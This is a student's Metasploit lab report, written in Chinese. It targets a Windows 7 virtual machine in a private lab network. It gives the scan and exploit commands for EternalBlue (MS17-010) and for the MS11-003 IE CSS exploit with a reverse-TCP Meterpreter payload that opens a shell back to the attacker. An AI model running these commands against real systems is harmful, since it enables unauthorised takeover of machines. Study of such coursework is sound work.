20201226马瑞婕Exp6-MSF应用基础
一、实验准备
安装win7虚拟机,迅雷下载种子如下
ed2k://|file|en_windows_7_ultimate_with_sp1_x64_dvd_u_677332.iso|3320903680|743598C64E635C72964CF02A3E0AD547|/
二、实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。
2.1 一个主动攻击实践
使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
漏洞介绍
在微软官方的漏洞库中,有此漏洞的介绍与补丁,补丁编号:KB4013389。永恒之蓝相关病毒,其实是利用了微软的 MS17-010 漏洞。MS17-010 是 Windows 系统一个底层服务的漏洞,恶意代码会扫描开放 445 文件共享端口的 Windows 机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

本实验使用 Win7 作为靶机来进行渗透测试
2.1.1 关闭防火墙
按图中操作即可

2.1.2 打开445端口
按图中操作即可



2.1.3 查看靶机IP地址
ipconfig

2.1.3 执行攻击
2.1.3.1 确认靶机是否存在漏洞
nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.48.140
结果如下,我们可以看到,有此漏洞


2.1.3.2 确认漏洞对应的MSF板块
msfconsole
msf6 > search ms17_010

2.1.3.3 确认板块IP,执行攻击
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.48.140loit是Win7的IP地址
exploit



2.2 一个针对浏览器的攻击
使用微软ms11-003漏洞
ms11-003(windows7IE溢出攻击) 是利用IE8中对css的解析存在一个问题,导致任何访问包含非法css的页面将导致IE8崩溃重启的漏洞。
kali(192.168.48.136)
靶机:Windows 7+IE 8(192.168.48.140)
攻击软件:metasploit
代码块:
//选择模块
use exploit/windows/browser/ms11_003_ie_css_import
//设置playload
set payload windows/meterpreter/reverse_tcp
//这是kali的地址
set srvhost 192.168.48.136
//也是kali的地址
set lhost 192.168.48.136
//下面的数字可以修改为学号
set uripath 1226
//监听
exploit
结果如下,我们获得了一个url链接:
http://192.168.48.136:8080/1226

之后:
在win7中,用IE访问:

在kali中,会有如下反馈

此时,执行:
sessions

选择1,获取到了shell
sessions -i
